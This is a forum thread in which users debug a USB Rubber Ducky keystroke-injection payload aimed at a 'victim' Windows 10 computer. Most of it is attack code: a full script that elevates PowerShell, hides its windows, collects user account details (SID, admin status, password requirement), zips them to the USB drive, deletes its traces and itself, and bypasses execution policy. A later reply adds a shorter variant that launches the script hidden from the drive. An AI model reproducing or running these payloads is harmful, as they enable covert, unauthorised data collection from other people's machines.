Saylor Posted January 4, 2017 Share Posted January 4, 2017 Hey you. I've just received my rubber ducky and I thought I'd give one of the generated payloads a go. My victim computer is a 64bit Win10 machine and I selected User information and save to this computer as the components of my script. After it's finished executing, the destination folder does have the Report.zip file in it but the file is empty. I don't even know where to start debugging this, so I'd really appreciate a nudge in the right direction. My keyboard layout is German, so I've selected Germany in the script generator as well and it seems to be using the German keys correctly (since the ALT+Y presses do work out fine). Quote Link to comment Share on other sites More sharing options...
xcoder Posted January 5, 2017 Share Posted January 5, 2017 recheck your script you can post it here and I will check it for you Quote Link to comment Share on other sites More sharing options...
Saylor Posted January 5, 2017 Author Share Posted January 5, 2017 1 hour ago, xcoder said: recheck your script you can post it here and I will check it for you Thank you! Here it is: DELAY 750 GUI r DELAY 1000 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 750 ALT y DELAY 750 ENTER ALT SPACE DELAY 1000 STRING m DELAY 1000 DOWNARROW REPEAT 100 ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report + "<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired ENTER STRING $UserType = $UserInfo.AccountType ENTER STRING $UserSid = $UserInfo.SID ENTER STRING $UserPass = $UserInfo.PasswordRequired ENTER STRING $IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator') ENTER STRING $Report = $Report + "<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>" ENTER STRING $Report = $Report + '</div>' ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'E:\\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL s DELAY 750 STRING C:\Windows\config-21642.ps1 ENTER DELAY 1000 ALT F4 DELAY 750 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1000 ALT y DELAY 750 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 750 STRING m DELAY 1000 DOWNARROW REPEAT 100 ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 750 STRING powershell.exe -windowstyle hidden -File C:\Windows\config-21642.ps1 ENTER In the payload gen, I entered E:\ as the destination folder. Quote Link to comment Share on other sites More sharing options...
0phoi5 Posted January 5, 2017 Share Posted January 5, 2017 First thing I would do is set all of the delays to DELAY 5000 and let it run through. Then you can be sure it's not a delay being too short (the PC can't keep up). Quote Link to comment Share on other sites More sharing options...
xcoder Posted January 5, 2017 Share Posted January 5, 2017 you code is not Correct! Copy script and past it in notepad remove DELAY STRING ENTER etc..... select all and past it in PowerShell Fix it as You like I`ll Give New Short Way for run your Script Quote Link to comment Share on other sites More sharing options...
xcoder Posted January 5, 2017 Share Posted January 5, 2017 (edited) DEFAULT_DELAY 100 DELAY 5000 GUI r DELAY 100 STRING cmd /Q /D /T:FE /F:OFF /V:ON /K mode con lines=1 cols=10 ENTER DELAY 200 STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set usb=%d ENTER DELAY 300 STRING %usb% ENTER DELAY 200 STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 200 STRING powershell.exe -File %usb%\config-21642.ps1 ENTER DELAY 200 STRING Exit ENTER Rubber Ducky Twin Duck Firmware Your PowerShell inside [USB FLASH DISK] config-21642.ps1 Edited January 5, 2017 by xcoder Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.